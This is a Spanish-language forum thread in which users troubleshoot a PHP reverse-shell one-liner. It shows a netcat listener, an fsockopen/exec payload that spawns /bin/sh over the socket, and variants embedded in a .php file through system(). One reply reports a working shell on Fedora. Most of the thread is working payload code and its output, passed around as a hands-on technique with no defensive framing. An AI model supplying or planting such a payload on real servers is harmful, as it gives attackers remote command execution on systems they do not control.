Hola foro tengo una duda
si pongo netcat a la escucha en el puerto 5000:
netcat -l -p 5000 -vv
y en otra terminal ejecuto esto:
php -r '$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");'
me devuelve una shell, Todo correcto ahora si creo una archivo.php y hago esto:
//NO ME FUNCIONA, No devuelve la shell
<?php
$ultima_linea = system("php -r '\$sock=fsockopen(\"127.0.0.1\",5000);exec(\"/bin/sh -i <&3 >&3 2>&3\");'",$retval);
?>
o esto:
//NO ME FUNCIONA, No devuelve la shell, Péeero si conecta....
<?php
$sock=fsockopen(127.0.0.1, 5000);
exec("/bin/sh -i <&3 >&3 2>&3");
?>
Hola, interesante lo que posteas, podrias exaplicarme que realiza este comando?
/bin/sh -i <&3 >&3 2>&3\
se que ejecuta una shell pero mas aya de eso no entiendo :X
y en cuanto a tu problema a mi me resulto con:
system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\'');
saludos.
estas seguro que te conecta teniendo netcat a la escucha?
<php system('php -r \'$sock=fsockopen("127.0.0.1",5000);exec("/bin/sh -i <&3 >&3 2>&3");\''); ?>
por que acabo de probarlo en un OS X y no me funcionó.
en que S.O. tienes el servidor con php?
fedora..
[dr@dr ~]$ nc -l 5000
sh: no job control in this shell
sh-4.1$
saludos